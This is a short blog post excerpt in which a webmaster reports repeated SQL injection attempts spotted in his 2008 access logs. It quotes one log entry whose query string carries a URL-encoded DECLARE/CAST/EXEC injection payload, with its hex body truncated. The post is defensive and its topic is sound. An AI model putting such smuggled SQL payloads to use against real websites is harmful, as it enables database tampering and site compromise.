SQL Injection Attack
Someone's been attempting to perform a SQL injection attack on my websites, but thankfully without much luck.
I was running through my error and access logs this morning (whilst trying to troubleshoot an issue) and spotted this rather strange entry, well 16 of them this morning alone:
24.47.218.244 - - [28/Aug/2008:05:59:13 +0000] "GET /blog/saffer-brings-veggies-to-life
/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445
...[truncated for brevity]...
%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6191 "-" "Mozilla/4.0 (compatible;
MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322)"
The truncated part is one huge long hexadecimal string. Being the curious person that I am, I investigated these requests a bit further.
Continue reading ►